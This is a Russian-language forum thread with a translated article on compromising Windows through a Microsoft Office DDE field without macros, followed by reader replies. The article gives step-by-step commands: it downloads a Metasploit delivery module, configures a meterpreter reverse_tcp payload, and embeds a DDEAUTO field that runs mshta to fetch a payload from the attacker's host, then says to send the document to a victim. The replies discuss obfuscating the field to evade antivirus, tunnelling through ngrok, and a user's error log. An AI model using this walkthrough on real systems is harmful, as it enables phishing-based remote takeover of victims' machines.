Статья Использование Windows при помощи DDE эксплойта Microsoft Office (MACROLESS)

[AnnaDavydova]

DDE экплойт также известен как динамический обмен данными, позволяет передавать данные между приложениями без какого-либо взаимодействия с пользователем. Хакеры использовали этот метод для запуска вредоносных скриптов с целью взлома системы.

Об этом в Microsoft сообщали такие службы, как Sensepost, Etienne Stalmans, и Saif El-Sherei, но он не был исправлен, поскольку многие приложения используют протокол DDE. Этот эксплойт не требует включения макрофункции.

Необходимые условия – DDE exploit

• Машина использующая операционную систему Windows
• Microsoft Office (любая версия)
• KALI LINUX

Мы вынуждены будем импортировать Metasploit эксплойт.
Загрузите его из GitHub с помощью командного терминала.

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Отправьте скрипт в местоположение Metasploit

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

Теперь наберите msfconsole на терминале, который запускает Metasploit framework, а затем наберите reload_all, чтобы загрузить модули.

Этот эксплойт использует функцию dde, чтобы поставить hta payload. А теперь наберите

use exploit/windows/dde_delivery

затем установите хост сервера, используя следующую команду:

set SRVHOST 192.168.177.141

мы должны установить прослушиватель payload. Не используйте порт 8080, поскольку порт сервера установлен по умолчанию на 8080.

1. установите PAYLOAD windows/meterpreter/reverse_tcp
2. установите LHOST 192.168.177.141
3. установите LPORT 6708
4. эксплойт

Теперь вставьте код в любой документ word. Мы использовали полностью обновленный office 365 pro plus. Разместите формулу, и у вас должно быть небольшое поле ошибки в документе, а затем щелкните правой кнопкой мыши по коду. Вставьте команду в документ между цветными скобками. Сохраните документ.

{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}

После отправки документа получателю у вас откроется сессия измерителя.

Отказ от ответственности

Эта статья предназначена только для образовательных целей. Любые действия и/или деятельность, связанные с материалом, содержащимся на этом веб-сайте, будут рассматриваться исключительно в зоне действия вашей ответственности. Нелегальное использование информации на этом веб-сайте может привести к уголовным обвинениям, выдвинутым против соответствующих лиц. Авторы и www.gbhackers.com не будут нести ответственность в случае возбуждения уголовного обвинения против любых лиц, злоупотребляющих информацией на этом веб-сайте, с целью нарушения закона.


Источник: Exploiting Windows Using Microsoft Office DDE Exploit (MACROLESS)

 

[OneDollar]

Nice! Ещё можно его обфусцировать до фуда, но это уже другая история!))

 

[kot-gor]

Добрый день, про обфускацию DDE ,кому интересно можно почитать здесь:
Staaldraad

 

[Tihon49]

Добрый день, про обфускацию DDE ,кому интересно можно почитать здесь:
Staaldraad

Было бы вообще шикарно, если ТС и эту статью про обфускацию переведёт.

 

[Underwood]

Было бы вообще шикарно, если ТС и эту статью про обфускацию переведёт

MS Word DDE vs AV методы обфускации

 

[Lenar]

Ребята извините за глупый вопрос я просто новичок в этом деле, но желания горит учится) Скажите если на документе .doc этот код куда вставлять?

 

[Underwood]

Ребята извините за глупый вопрос я просто новичок в этом деле, но желания горит учится) Скажите если на документе .doc этот код куда вставлять?

Insert tab -> Quick Parts -> Field -> Formula -> !Unexpected End of Formula

Спойлер

 

[Mitistofel]

цель должна в "ворде" макросы включать?

 

[Lenar]

цель должна в "ворде" макросы включать?

без макросов работает)

 

[Mitistofel]

без макросов работает)

Проверял уже?

 

[kot-gor]

народ, макросы это совсем другой вид уязвимости..По dde если система с обновлениями, то ничего не получится. плюс антивирусы палят безбожно.

 

[Lenar]

да)

 

[Mitistofel]

народ, макросы это совсем другой вид уязвимости..По dde если система с обновлениями, то ничего не получится. плюс антивирусы палят безбожно.

После этих слов, мне этот метод на много меньше нравится )

 

[EliotAnderson]

А для чего нужен SRVHOST? Хотел через ngrok попробовать, но как я думаю через ngrok не выйдет?

 

[Tihon49]

А для чего нужен SRVHOST? Хотел через ngrok попробовать, но как я думаю через ngrok не выйдет?

Выйдет. Через ngrok вообще всё всегда выходит! Стабильно хорошая штука!

 

[OneDollar]

народ, макросы это совсем другой вид уязвимости..По dde если система с обновлениями, то ничего не получится. плюс антивирусы палят безбожно.

Неа, не палят )) в сторону хекса смотреть...)

 

[kot-gor]

это что то новое..хотя мысль уловил..

 

[OneTrust]

Неа, не палят )) в сторону хекса смотреть...)

Загадочные у вас однако комментарии) Интересно узнать об этой реализации более детально. Может вы на статью созреете?)

 

[OneTrust]

Ребята извините за глупый вопрос я просто новичок в этом деле, но желания горит учится) Скажите если на документе .doc этот код куда вставлять?

Можно использовать и быструю комбинацию Crl+F9.

 

[rudireg]

Запускаю в Ubuntu
Подскажите что не так?

msf exploit(windows/dde_delivery) > exploit
[-] Handler failed to bind to 192.168.177.141:6708:-  -
[*] Started reverse TCP handler on 0.0.0.0:6708
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (192.168.177.141:8080).

Такие опции

msf exploit(windows/dde_delivery) > show options

Module options (exploit/windows/dde_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.177.141  yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.177.141  yes       The listen address (an interface may be specified)
   LPORT     6708             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic